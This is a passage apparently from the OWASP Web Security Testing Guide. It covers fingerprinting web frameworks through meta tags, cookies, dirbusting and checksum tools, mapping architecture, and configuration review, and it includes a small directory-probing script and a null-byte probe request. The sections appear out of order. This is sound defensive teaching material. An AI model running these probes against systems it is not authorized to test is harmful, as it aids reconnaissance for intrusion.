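    r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']',
    re.IGNORECASE,
)

def find_generator(html):
    match = GENERATOR_RE.search(html)
    return match.group(1) if match else None

print(find_generator('<meta name="generator" content="WordPress 3.9.2" />'))
# WordPress 3.9.2
```
</p><p>The IGNORECASE flag also catches variants such as Drupal's name="Generator".</p><p>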
The comment, specific paths and script variables can all help an attacker to quickly determine an instance of an application.</p><p><meta name="generator" content="WordPress 3.9.2" /></p><p>More frequently such information is placed between the <head> and </head> tags, in <meta> tags, or at the end of the page. Nevertheless, it is recommended to check the whole document since it can be useful for other purposes such as inspection of other useful comments and hidden fields.</p><p>Specific Files and Folders</p><p>Apart from information gathered from HTML sources, there is another approach which greatly helps an attacker to determine the application with high accuracy. Every application has its own specific file and folder structure on the server. It has been pointed out that one can see specific paths in the HTML page source, but sometimes they are not explicitly presented there yet still reside on the server.</p><p>In order to uncover them, a technique known as dirbusting is used. Dirbusting is brute forcing a target with predictable folder and file names and monitoring HTTP responses to enumerate server contents. This information can be used both for finding default files and attacking them, and for fingerprinting the web application. Dirbusting can be done in several ways; the example below shows a successful dirbusting attack against a WordPress-powered target with the help of a defined list and the Intruder functionality of Burp Suite.</p><p>Figure 4.1.9-1: Dirbusting with Burp</p><p>We can see that for some WordPress-specific folders (for instance, /wp-includes/, /wp-admin/ and /wp-content/) the HTTP responses are 403 (Forbidden), 302 (Found, redirection to wp-login.php) and 200 (OK) respectively. This is a good indicator that the target is WordPress-powered.
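</p><p>The status-code pattern above is straightforward to reproduce with a short script. The sketch below is a minimal illustration: the wordlist is a tiny sample, the opener parameter exists only so the request mechanism can be swapped out, and a real run requires network access and authorization to test the target:</p><p>
```python
from urllib.request import urlopen
from urllib.error import HTTPError, URLError

# A tiny sample of predictable WordPress paths; real dirbusting uses
# large wordlists such as those in FuzzDB.
WORDLIST = ["wp-admin/", "wp-includes/", "wp-content/", "wp-login.php"]

def probe(base_url, paths, opener=urlopen):
    """Request each path and record the HTTP status code."""
    results = {}
    for path in paths:
        url = base_url.rstrip("/") + "/" + path
        try:
            results[path] = opener(url).status
        except HTTPError as err:   # 4xx/5xx responses still fingerprint the target
            results[path] = err.code
        except URLError:           # unreachable or connection refused
            results[path] = None
    return results

# Example (hypothetical target, requires authorization):
# probe("http://target.example", WORDLIST)
```
</p><p>A mix of 403, 302 and 200 responses across these paths, as in the Burp example above, points to a WordPress installation.</p><p>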
In the same way it is possible to dirbust different application plugin folders and their versions. In the screenshot below one can see a typical CHANGELOG file of a Drupal plugin, which provides information on the application being used and discloses a vulnerable plugin version.</p><p>Figure 4.1.9-2: Drupal Botcha Disclosure</p><p>Tip: before starting dirbusting, it is recommended to check the robots.txt file first. Sometimes application-specific folders and other sensitive information can be found there as well. An example of such a robots.txt file is presented in the screenshot below.</p><p>Figure 4.1.9-3: Robots Info Disclosure</p><p>Specific files and folders are different for each application. It is recommended to install the corresponding application during penetration tests in order to have a better understanding of what infrastructure is present and what files might be left on the server.
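</p><p>Version fingerprinting by file checksums, the principle behind the BlindElephant tool described below, can be sketched in a few lines. The signature table here is purely illustrative, computed from a made-up file body; real tools ship databases of hashes of known static files per version:</p><p>
```python
import hashlib

# Hash retrieved static-file content and look it up in a table that maps
# known checksums to application versions.
def checksum_version(content, signatures):
    digest = hashlib.md5(content).hexdigest()
    return signatures.get(digest, "unknown")

# Illustrative signature table (not real hashes of any application).
signatures = {
    hashlib.md5(b"example changelog for version 7.14\n").hexdigest(): "Example App 7.14",
}

print(checksum_version(b"example changelog for version 7.14\n", signatures))
print(checksum_version(b"modified content", signatures))
```
</p><p>This also illustrates why the "checksum management" remediation works: changing even one byte of a static file yields a different digest and defeats such scanners.</p><p>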
However, several good file lists already exist; one good example is the FuzzDB wordlists of predictable files/folders: https://github.com/fuzzdb-project/fuzzdb</p><p>Common Application Identifiers</p><p>Cookies</p><p>Application – Cookie name</p><p>phpBB – phpbb3_</p><p>Wordpress – wp-settings</p><p>1C-Bitrix – BITRIX_</p><p>AMPcms – AMP</p><p>Django CMS – django</p><p>DotNetNuke – DotNetNukeAnonymous</p><p>e107 – e107_tz</p><p>EPiServer – EPiTrace, EPiServer</p><p>Graffiti CMS – graffitibot</p><p>Hotaru CMS – hotaru_mobile</p><p>ImpressCMS – ICMSession</p><p>Indico – MAKACSESSION</p><p>InstantCMS – InstantCMS[logdate]</p><p>Kentico CMS – CMSPreferredCulture</p><p>MODx – SN4[12symb]</p><p>TYPO3 – fe_typo_user</p><p>Dynamicweb – Dynamicweb</p><p>LEPTON – lep[some_numeric_value]+sessionid</p><p>Wix – Domain=.wix.com</p><p>VIVVO – VivvoSessionId</p><p>HTML Source Code</p><p>Application – Keyword</p><p>Wordpress – <meta name="generator" content="WordPress 3.9.2" /></p><p>phpBB – <body id="phpbb"</p><p>Mediawiki – <meta name="generator" content="MediaWiki 1.21.9" /></p><p>Joomla – <meta name="generator" content="Joomla! - Open Source Content Management" /></p><p>Drupal – <meta name="Generator" content="Drupal 7 (http://drupal.org)" /></p><p>DotNetNuke – DNN Platform - http://www.dnnsoftware.com</p><p>Tools</p><p>A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-based fingerprinting tools.</p><p>WhatWeb</p><p>Website: https://www.morningstarsecurity.com/research/whatweb</p><p>Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build.
Language: Ruby</p><p>Matches for fingerprinting are made with:</p><p>Text strings (case sensitive)</p><p>Regular expressions</p><p>Google Hack Database queries (limited set of keywords)</p><p>MD5 hashes</p><p>URL recognition</p><p>HTML tag patterns</p><p>Custom Ruby code for passive and aggressive operations</p><p>Sample output is presented in the screenshot below:</p><p>Figure 4.1.9-4: Whatweb Output Sample</p><p>https://www.kali.org/</p><p>BlindElephant</p><p>Website: http://blindelephant.sourceforge.net/</p><p>This great tool works on the principle of static-file checksums to detect version differences, thus providing very high-quality fingerprinting. Language: Python</p><p>Sample output of a successful fingerprint:</p><p>pentester$ python BlindElephant.py http://my_target drupal</p><p>Loaded /Library/Python/2.7/site-packages/blindelephant/dbs/drupal.pkl with 145 versions, 478 differentiating paths, and 434 version groups.</p><p>Starting BlindElephant fingerprint for version of drupal at http://my_target</p><p>Hit http://my_target/CHANGELOG.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint. 527b085a3717bd691d47713dff74acf4</p><p>Hit http://my_target/INSTALL.txt</p><p>File produced no match. Error: Retrieved file doesn't match known fingerprint. 14dfc133e4101be6f0ef5c64566da4a4</p><p>Hit http://my_target/misc/drupal.js</p><p>Possible versions based on result: 7.12, 7.13, 7.14</p><p>Hit http://my_target/MAINTAINERS.txt</p><p>File produced no match.
Error: Retrieved file doesn't match known fingerprint. 36b740941a19912f3fdbfcca7caa08ca</p><p>Hit http://my_target/themes/garland/style.css</p><p>Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13, 7.14</p><p>...</p><p>Fingerprinting resulted in:</p><p>7.14</p><p>Best Guess: 7.14</p><p>Wappalyzer</p><p>Website: https://www.wappalyzer.com/</p><p>Wappalyzer is a browser extension for Firefox and Chrome. It relies solely on regular-expression matching and needs nothing more than the page to be loaded in the browser. It works completely at the browser level and presents its results as icons. Although it occasionally produces false positives, it is very handy for getting an immediate notion of which technologies were used to build a target website, right after browsing a page.</p><p>Note that by default, Wappalyzer will send anonymised data about the technology running on visited websites back to the developers, which is then sold to third parties. Make sure you disable this data collection in the add-on options.</p><p>Sample output of the plug-in is presented in the screenshot below.</p><p>Figure 4.1.9-5: Wappalyzer Output for OWASP Website</p><p>References</p><p>Whitepapers</p><p>Saumil Shah: “An Introduction to HTTP Fingerprinting” (https://web.archive.org/web/20190526182734/https://net-square.com/httprint_paper.html)</p><p>Anant Shrivastava: “Web Application Finger Printing” (https://anantshri.info/articles/web_app_finger_printing.html)</p><p>Remediation</p><p>The general advice is to use several of the tools described above and check logs to better understand what exactly helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide framework tracks, it’s possible to achieve a better level of security and to make sure that the framework cannot be detected by automatic scans. 
Below are some specific recommendations by framework marker location, together with some additional interesting approaches.</p><p>HTTP Headers</p><p>Check the configuration and disable or obfuscate all HTTP headers that disclose information about the technologies used. Here is an interesting article about HTTP header obfuscation using NetScaler.</p><p>Cookies</p><p>It is recommended to change cookie names by making changes in the corresponding configuration files.</p><p>HTML Source Code</p><p>Manually check the contents of the HTML code and remove everything that explicitly points to the framework.</p><p>General guidelines:</p><p>Make sure there are no visual markers disclosing the framework</p><p>Remove any unnecessary comments (copyrights, bug information, specific framework comments)</p><p>Remove META and generator tags</p><p>Use the company’s own CSS or JS files and do not store them in framework-specific folders</p><p>Do not use default scripts on the page, or obfuscate them if they must be used.</p><p>Specific Files and Folders</p><p>General guidelines:</p><p>Remove any unnecessary or unused files on the server. This includes text files that disclose version and installation information.</p><p>Restrict access to other files in order to return a 404 response when they are accessed from outside. This can be done, for example, by modifying the .htaccess file and adding RewriteCond or RewriteRule directives there. An example of such a restriction for two common WordPress folders is presented below.</p><p>RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR]</p><p>RewriteCond %{REQUEST_URI} /wp-admin/$</p><p>RewriteRule ^ - [R=404,L]</p><p>However, these are not the only ways to restrict access. 
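After applying hardening like the above, it helps to re-check responses for leftover markers. The sketch below uses a hypothetical helper name and only a small assumed set of header names (not an exhaustive list) to flag response headers that still disclose technology:

```python
# Headers that commonly disclose server-side technology (a non-exhaustive
# set assumed for illustration).
DISCLOSING_HEADERS = {"server", "x-powered-by", "x-aspnet-version", "x-generator"}

def find_disclosing_headers(headers):
    """Return the response headers that reveal technology information."""
    return sorted(
        f"{name}: {value}"
        for name, value in headers.items()
        if name.lower() in DISCLOSING_HEADERS
    )

# Example against the headers of a captured response:
sample = {
    "Content-Type": "text/html",
    "Server": "Apache/2.4.41 (Ubuntu)",
    "X-Powered-By": "PHP/7.4.3",
}
print(find_disclosing_headers(sample))
# ['Server: Apache/2.4.41 (Ubuntu)', 'X-Powered-By: PHP/7.4.3']
```

An empty result after remediation suggests the headers no longer give the framework away, although body markers and cookies must still be checked separately.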
To automate this kind of access restriction, framework-specific plugins exist. One example for WordPress is StealthLogin.</p><p>https://wordpress.org/plugins/stealth-login-page</p><p>Additional Approaches</p><p>General guidelines:</p><p>Checksum management: the purpose of this approach is to beat checksum-based scanners and not let them disclose files by their hashes. Generally, there are two approaches to checksum management:</p><p>Change the location where those files are placed (i.e. move them to another folder, or rename the existing folder)</p><p>Modify the contents - even a slight modification results in a completely different hash sum, so adding a single byte at the end of the file should not be a big problem.</p><p>Controlled chaos: a fun and effective method that involves adding bogus files and folders from other frameworks in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders, and not to break the current framework!</p><p>Map Application Architecture</p><p>ID</p><p>WSTG-INFO-10</p><p>Summary</p><p>The complexity of interconnected and heterogeneous web server infrastructure, which can include hundreds of web applications, makes configuration management and review a fundamental step in testing and deploying every single application. In fact, it takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and seemingly unimportant problems may evolve into severe risks for another application on the same server.</p><p>To address these problems, it is of utmost importance to perform an in-depth review of configuration and known security issues. Before performing an in-depth review it is necessary to map the network and application architecture. 
The different elements that make up the infrastructure need to be determined to understand how they interact with a web application and how they affect security.</p><p>How to Test</p><p>Map the Application Architecture</p><p>The application architecture needs to be mapped through some testing to determine what different components are used to build the web application. In small setups, such as a simple CGI-based application, a single server might be used that runs the web server which executes the C, Perl, or shell CGI application, and perhaps also the authentication mechanism.</p><p>In more complex setups, such as an online banking system, multiple servers might be involved. These may include a reverse proxy, a front-end web server, an application server and a database server or LDAP server. Each of these servers will be used for different purposes and might even be divided into different networks with firewalls between them. This creates different DMZs so that access to the web server will not grant a remote user access to the authentication mechanism itself, and so that compromises of the different elements of the architecture can be isolated in a way that they will not compromise the whole architecture.</p><p>Getting knowledge of the application architecture can be easy if this information is provided to the testing team by the application developers in document form or through interviews, but can also prove to be very difficult if doing a blind penetration test.</p><p>In the latter case, a tester will first start with the assumption that there is a simple setup (a single server). Then they will retrieve information from other tests and derive the different elements, question this assumption and extend the architecture map. The tester will start by asking simple questions such as: “Is there a firewalling system protecting the web server?”. 
This question will be answered based on the results of network scans targeted at the web server and the analysis of whether the network ports of the web server are being filtered at the network edge (no answer or ICMP unreachables are received) or if the server is directly connected to the Internet (i.e. returns RST packets for all non-listening ports). This analysis can be enhanced to determine the type of firewall used based on network packet tests. Is it a stateful firewall or is it an access list filter on a router? How is it configured? Can it be bypassed?</p><p>Detecting a reverse proxy in front of the web server needs to be done by the analysis of the web server banner, which might directly disclose the existence of a reverse proxy (for example, if ‘WebSEAL’ is returned).</p><p>https://publib.boulder.ibm.com/tividd/td/ITAME/SC32-1359-00/en_US/HTML/am51_webseal_guide11.htm#i1038108</p><p>It can also be determined by obtaining the answers given by the web server to requests and comparing them to the expected answers. For example, some reverse proxies act as “intrusion prevention systems” (or web-shields) by blocking known attacks targeted at the web server. If the web server is known to answer with a 404 message to a request that targets an unavailable page, but returns a different error message for some common web attacks like those done by CGI scanners, it might be an indication of a reverse proxy (or an application-level firewall) which is filtering the requests and returning a different error page than the one expected. 
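The response-comparison heuristic just described can be sketched as a small check. The function name and sample responses below are hypothetical; in practice the two inputs would be the captured status and body of a request for a random nonexistent page and of an attack-like probe:

```python
def likely_intermediary(benign_404, attack_probe):
    """Heuristic: if an attack-like request gets a different status or error
    page than an ordinary request for a missing page, a reverse proxy or
    application-level firewall is probably filtering the traffic."""
    benign_status, benign_body = benign_404
    probe_status, probe_body = attack_probe
    return benign_status != probe_status or benign_body != probe_body

# Captured responses (illustrative values):
normal = (404, "<h1>Not Found</h1>")   # random nonexistent page
probe = (200, "Access denied.")        # a filtering device answered instead
print(likely_intermediary(normal, probe))
# True
```

A positive result is only a hint, not proof; server-side rewrite rules can produce the same asymmetry, so the finding should be cross-checked against banners and timing behaviour.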
Another example: if the web server returns a set of available HTTP methods (including TRACE) but the expected methods return errors, then there is probably something in between blocking them.</p><p>In some cases, even the protection system gives itself away:</p><p>GET /web-console/ServerInfo.jsp%00 HTTP/1.0</p><p>HTTP/1.0 200</p><p>Pragma: no-cache</p><p>Cache-Control: no-cache</p><p>Content-Type: text/html</p><p>Content-Length: 83</p><p><TITLE>Error</TITLE></p><p><BODY></p><p><H1>Error</H1></p><p>FW-1 at XXXXXX: Access denied.</BODY></p><p>Example of the Security Server of Check Point Firewall-1 NG AI “Protecting” a Web Server</p><p>Reverse proxies can also be introduced as proxy-caches to accelerate the performance of back-end application servers. Detecting these proxies can be done based on the Server header. They can also be detected by timing requests that should be cached by the server and comparing the time taken to serve the first request with subsequent requests.</p><p>Another element that can be detected is network load balancers. Typically, these systems will balance a given TCP/IP port to multiple servers based on different algorithms (round-robin, web server load, number of requests, etc.). Thus, the detection of this architecture element needs to be done by examining multiple requests and comparing results to determine if the requests are going to the same or different web servers. For example, based on the Date header if the server clocks are not synchronized. In some cases, the load-balancing process might inject new information in the headers that will make it stand out distinctively, like the AlteonP cookie introduced by Nortel’s Alteon WebSystems load balancer.</p><p>Application web servers are usually easy to detect. 
The request for several resources is handled by the application server itself (not the web server) and the response headers will vary significantly (including different or additional values in the answer header). Another way to detect these is to see if the web server tries to set cookies which are indicative of an application web server being used (such as the JSESSIONID provided by some J2EE servers), or to rewrite URLs automatically to do session tracking.</p><p>Authentication back ends (such as LDAP directories, relational databases, or RADIUS servers), however, are not as easy to detect from an external point of view in an immediate way, since they will be hidden by the application itself.</p><p>The use of a back end database can be determined simply by navigating an application. If there is highly dynamic content generated “on the fly,” it is probably being extracted from some sort of database by the application itself. Sometimes the way information is requested might give insight into the existence of a database back-end. 
For example, consider an online shopping application that uses numeric identifiers (‘id’) when browsing the different articles in the shop. However, when doing a blind application test, knowledge of the underlying database is usually only available when a vulnerability surfaces in the application, such as poor exception handling or susceptibility to SQL injection.</p><p>4.2 Configuration and Deployment Management Testing</p><p>4.2.1 Test Network Infrastructure Configuration</p><p>4.2.2 Test Application Platform Configuration</p><p>4.2.3 Test File Extensions Handling for Sensitive Information</p><p>4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information</p><p>4.2.5 Enumerate Infrastructure and Application Admin Interfaces</p><p>4.2.6 Test HTTP Methods</p><p>4.2.7 Test HTTP Strict Transport Security</p><p>4.2.8 Test RIA Cross Domain Policy</p><p>4.2.9 Test File Permission</p><p>4.2.10 Test for Subdomain Takeover</p><p>4.2.11 Test Cloud Storage</p><p>Test Network Infrastructure Configuration</p><p>ID</p><p>WSTG-CONF-01</p><p>Summary</p><p>The intrinsic complexity of interconnected and heterogeneous web server infrastructure, which can include hundreds of web applications, makes configuration management and review a fundamental step in testing and deploying every single application. It takes only a single vulnerability to undermine the security of the entire infrastructure, and even small and seemingly unimportant problems may evolve into severe risks for another application on the same server. 
In order to address these problems, it is of utmost importance to perform an in-depth review of configuration and known security issues, after having mapped the entire architecture.</p><p>Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities that might compromise the application itself.</p><p>For example, a web server vulnerability that would allow a remote attacker to disclose the source code of the application itself (a vulnerability that has arisen a number of times in both web servers and application servers) could compromise the application, as anonymous users could use the information disclosed in the source code to leverage attacks against the application or its users.</p><p>The following steps need to be taken to test the configuration management infrastructure:</p><p>The different elements that make up the infrastructure need to be determined in order to understand how they interact with a web application and how they affect its security.</p><p>All the elements of the infrastructure need to be reviewed in order to make sure that they don’t contain any known vulnerabilities.</p><p>A review needs to be made of the administrative tools used to maintain all the different elements.</p><p>The authentication systems need to be reviewed in order to assure that they serve the needs of the application and that they cannot be manipulated by external users to leverage access.</p><p>A list of defined ports which are required for the application should be maintained and kept under change control.</p><p>After having mapped the different elements that make up the infrastructure (see Map Network and 
Application Architecture) it is possible to review the configuration of each element found and test for any known vulnerabilities.</p><p>Test Objectives</p><p>Map the infrastructure supporting the application and understand how it affects the security of the application.</p><p>How to Test</p><p>Known Server Vulnerabilities</p><p>Vulnerabilities found in the different areas of the application architecture, be it in the web server or in the back end database, can severely compromise the application itself. For example, consider a server vulnerability that allows a remote, unauthenticated user to upload files to the web server or even to replace files. This vulnerability could compromise the application, since a rogue user may be able to replace the application itself or introduce code that would affect the back end servers, as its application code would be run just like any other application.</p><p>Reviewing server vulnerabilities can be hard to do if the test needs to be done through a blind penetration test. In these cases, vulnerabilities need to be tested from a remote site, typically using an automated tool. However, testing for some vulnerabilities can have unpredictable results on the web server, and testing for others (like those directly involved in denial of service attacks) might not be possible due to the service downtime involved if the test was successful.</p><p>Some automated tools will flag vulnerabilities based on the web server version retrieved. This leads to both false positives and false negatives. On the one hand, if the web server version has been removed or obscured by the local site administrator, the scan tool will not flag the server as vulnerable even if it is. 
On the other hand, if the vendor providing the software does not update the web server version when vulnerabilities are fixed, the scan tool will flag vulnerabilities that do not exist. The latter case is actually very common, as some operating system vendors backport patches for security vulnerabilities to the software they provide in the operating system but do not do a full upgrade to the latest software version. This happens in most GNU/Linux distributions such as Debian, Red Hat or SuSE. In most cases, vulnerability scanning of an application architecture will only find vulnerabilities associated with the “exposed” elements of the architecture (such as the web server) and will usually be unable to find vulnerabilities associated with elements which are not directly exposed, such as the authentication back ends, the back end database, or reverse proxies in use.</p><p>Finally, not all software vendors disclose vulnerabilities in a public way, and therefore these weaknesses do not become registered within publicly known vulnerability databases [2]. This information is only disclosed to customers or published through fixes that do not have accompanying advisories. This reduces the usefulness of vulnerability scanning tools. Typically, vulnerability coverage of these tools will be very good for common products (such as the Apache web server, Microsoft’s Internet Information Server, or IBM’s Lotus Domino) but will be lacking for lesser known products.</p><p>This is why reviewing vulnerabilities is best done when the tester is provided with internal information about the software used, including the versions and releases used and the patches applied to the software. With this information, the tester can retrieve the information from the vendor itself and analyze what vulnerabilities might be present in the architecture and how they can affect the application itself. 
When possible, these vulnerabilities can be tested to determine their real effects and to detect if there might be any external elements (such as intrusion detection or prevention systems) that might reduce or negate the possibility of successful exploitation. Testers might even determine, through a configuration review, that the vulnerability is not present at all, since it affects a software component that is not in use.</p><p>It is also worthwhile to note that vendors will sometimes silently fix vulnerabilities and make the fixes available with new software releases. Different vendors will have different release cycles that determine the support they might provide for older releases. A tester with detailed information on the software versions used by the architecture can analyse the risk associated with the use of old software releases that might be unsupported in the short term or are already unsupported. This is critical, since if a vulnerability were to surface in an old software version that is no longer supported, the systems personnel might not be directly aware of it. No patches will ever be made available for it, and advisories might not list that version as vulnerable, as it is no longer supported. Even in the event that they are aware that the vulnerability is present and the system is vulnerable, they will need to do a full upgrade to a new software release, which might introduce significant downtime in the application architecture or might force the application to be re-coded due to incompatibilities with the latest software version.</p><p>Administrative Tools</p><p>Any web server infrastructure requires the existence of administrative tools to maintain and update the information used by the application. This information includes static content (web pages, graphic files), application source code, user authentication databases, etc. 
Administrative tools will differ depending on the site, technology, or software used. For example, some web servers will be managed using administrative interfaces which are, themselves, web servers (such as the iPlanet web server), or will be administered via plain-text configuration files (in the Apache case [3]), or use operating-system GUI tools (when using Microsoft’s IIS server or ASP.NET).</p><p>In most cases the server configuration will be handled using different file maintenance tools used by the web server, which are managed through FTP servers, WebDAV, network file systems (NFS, CIFS) or other mechanisms. Obviously, the operating system of the elements that make up the application architecture will also be managed using other tools. Applications may also have administrative interfaces embedded in them that are used to manage the application data itself (users, content, etc.).</p><p>After having mapped the administrative interfaces used to manage the different parts of the architecture, it is important to review them, since if an attacker gains access to any of them they can then compromise or damage the application architecture. To do this it is important to:</p><p>Determine the mechanisms that control access to these interfaces and their associated susceptibilities. This information may be available online.</p><p>Change the default username and password.</p><p>Some companies choose not to manage all aspects of their web server applications, but may have other parties managing the content delivered by the web application. This external company might either provide only parts of the content (news updates or promotions) or might manage the web server completely (including content and code). 
It is common to find administrative interfaces available from the Internet in these situations, since using the Internet is cheaper than providing a dedicated line that will connect the external company to the application infrastructure through a management-only interface. In this situation, it is very important to test whether the administrative interfaces can be vulnerable to attacks.</p><p>References</p><p>[1] WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework.</p><p>[2] Such as Symantec’s Bugtraq, ISS’ X-Force, or NIST’s National Vulnerability Database (NVD).</p><p>[3] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet.</p><p>Test Application Platform Configuration</p><p>ID</p><p>WSTG-CONF-02</p><p>Summary</p><p>Proper configuration of the individual elements that make up an application architecture is important in order to prevent mistakes that might compromise the security of the whole architecture.</p><p>Configuration review and testing is a critical task in creating and maintaining an architecture. 
This is because many different systems will usually be provided with generic configurations that might not be suited to the task they will perform on the specific site they’re installed on.</p><p>While the typical web and application server installation will contain a lot of functionality (like application examples, documentation, test pages), what is not essential should be removed before deployment to avoid post-install exploitation.</p><p>How to Test</p><p>Black-Box Testing</p><p>Sample and Known Files and Directories</p><p>Many web servers and application servers provide, in a default installation, sample applications and files for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have later been found to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), and CAN-2003-1172 (Directory traversal in the view-source sample in Apache’s Cocoon).</p><p>CGI scanners include a detailed list of known files and directory samples that are provided by different web or application servers and might be a fast way to determine if these files are present. However, the only way to be really sure is to do a full review of the contents of the web server or application server and determine whether they are related to the application itself or not.</p><p>Comment Review</p><p>It is very common for programmers to add comments when developing large web-based applications. 
However, comments included inline in HTML code might reveal internal information that should not be available to an attacker. Sometimes even source code is commented out, since the functionality is no longer required, but this comment is leaked out to the HTML pages returned to the users unintentionally.</p><p>Comment review should be done in order to determine if any information is being leaked through comments. This review can only be done thoroughly through an analysis of the web server’s static and dynamic content and through file searches. It can be useful to browse the site either in an automatic or guided fashion and store all the content retrieved. This retrieved content can then be searched in order to analyse any HTML comments available in the code.</p><p>System Configuration</p><p>CIS-CAT gives IT and security professionals a fast, detailed assessment of target systems’ conformance to CIS Benchmarks. CIS also provides recommended system configuration hardening guides covering databases, operating systems, web servers, and virtualization.</p><p>1 CIS Benchmarks</p><p>2 CIS Benchmarks Downloads</p><p>https://www.cisecurity.org/cis-benchmarks/</p><p>https://learn.cisecurity.org/benchmarks</p><p>Gray-Box Testing</p><p>Configuration Review</p><p>The web server or application server configuration plays an important role in protecting the contents of the site, and it must be carefully reviewed in order to spot common configuration mistakes. Obviously, the recommended configuration varies depending on the site policy, and the functionality that should be provided by the server software. 
In most cases, however, configuration guidelines (either provided by the software vendor or external parties) should be followed to determine if the server has been properly secured.</p><p>It is impossible to generically say how a server should be configured; however, some common guidelines should be taken into account:</p><p>Only enable server modules (ISAPI extensions in the case of IIS) that are needed for the application. This reduces the attack surface, since the server is reduced in size and complexity as software modules are disabled. It also prevents vulnerabilities that might appear in the vendor software from affecting the site if they are only present in modules that have been already disabled.</p><p>Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages. Specifically make sure that any application errors will not be returned to the end user and that no code is leaked through these errors, since it will help an attacker. It is actually very common to forget this point since developers do need this information in pre-production environments.</p><p>Make sure that the server software runs with minimized privileges in the operating system. This prevents an error in the server software from directly compromising the whole system.</p><p>Product and company names may be trademarks of their respective owners. Use of a term in this document should not be regarded as affecting the validity of any trademark or service mark.</p><p>Contacting OWASP</p><p>Contact details for the OWASP Foundation are available online. If you have a question concerning a particular project, we strongly recommend using the Google Group for that project. 
Many questions can also be answered by searching the OWASP web site, so please check there first.</p><p>Follow Us</p><p>https://owasp.org/</p><p>https://owasp.org/contact/</p><p>https://groups.google.com/a/owasp.org/forum/</p><p>https://www.linkedin.com/company/owasp/</p><p>https://twitter.com/owasp_wstg</p><p>Introduction</p><p>The OWASP Testing Project</p><p>The OWASP Testing Project has been in development for many years. The aim of the project is to help people understand the what, why, when, where, and how of testing web applications. The project has delivered a complete testing framework, not merely a simple checklist or prescription of issues that should be addressed. Readers can use this framework as a template to build their own testing programs or to qualify other people’s processes. The Testing Guide describes in detail both the general testing framework and the techniques required to implement the framework in practice.</p><p>Writing the Testing Guide has proven to be a difficult task. It was a challenge to obtain consensus and develop content that allowed people to apply the concepts described in the guide, while also enabling them to work in their own environment and culture. It was also a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle.</p><p>However, the group is very satisfied with the results of the project. Many industry experts and security professionals, some of whom are responsible for software security at some of the largest companies in the world, are validating the testing framework. This framework helps organizations test their web applications in order to build reliable and secure software. 
The framework does not simply highlight areas of weakness, although the latter is certainly a by-product of</p><p>many of the OWASP guides and checklists. As such, hard decisions had to be made about the appropriateness of</p><p>certain testing techniques and technologies. The group fully understands that not everyone will agree upon all of these</p><p>decisions. However, OWASP is able to take the high ground and change culture over time through awareness and</p><p>education based on consensus and experience.</p><p>The rest of this guide is organized as follows: this introduction covers the pre-requisites of testing web applications and</p><p>the scope of testing. It also covers the principles of successful testing and testing techniques, best practices for</p><p>reporting, and business cases for security testing. Chapter 3 presents the OWASP Testing Framework and explains its</p><p>techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to</p><p>test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing.</p><p>Measuring Security: the Economics of Insecure Software</p><p>A basic tenet of software engineering is summed up in a quote from Controlling Software Projects: Management,</p><p>Measurement, and Estimates by Tom DeMarco:</p><p>You can’t control what you can’t measure.</p><p>Security testing is no different. Unfortunately, measuring security is a notoriously difficult process.</p><p>One aspect that should be emphasized is that security measurements are about both the specific technical issues (e.g.,</p><p>how prevalent a certain vulnerability is) and how these issues affect the economics of software. Most technical people</p><p>will at least understand the basic issues, or they may have a deeper understanding of the vulnerabilities. 
Sadly, few are</p><p>able to translate that technical knowledge into monetary terms and quantify the potential cost of vulnerabilities to the</p><p>application owner’s business. Until this happens, CIOs will not be able to develop an accurate return on security</p><p>investment and, subsequently, assign appropriate budgets for software security. While estimating the cost of insecure</p><p>software may appear a daunting task, there has been a significant amount of work in this direction. For example, in</p><p>June 2002, the US National Institute of Standards and Technology (NIST) published a survey on the cost of insecure software to the US</p><p>economy due to inadequate software testing. Interestingly, they estimate that a better testing infrastructure would save</p><p>more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security</p><p>have been studied by academic researchers. Ross Anderson’s page on economics and security has more information</p><p>about some of these efforts.</p><p>https://isbnsearch.org/isbn/9780131717114</p><p>https://en.wikiquote.org/wiki/Tom_DeMarco</p><p>https://www.nist.gov/director/planning/upload/report02-3.pdf</p><p>https://www.cl.cam.ac.uk/~rja14/econsec.html</p><p>The framework described in this document encourages people to measure security throughout the entire development</p><p>process. They can then relate the cost of insecure software to the impact it has on the business, and consequently</p><p>develop appropriate business processes and assign resources to manage the risk. Remember that measuring and</p><p>testing web applications is even more critical than for other software, since web applications are exposed to millions of</p><p>users through the Internet.</p><p>What is Testing?</p><p>Many things need to be tested during the development life cycle of a web application, but what does testing actually</p><p>mean?
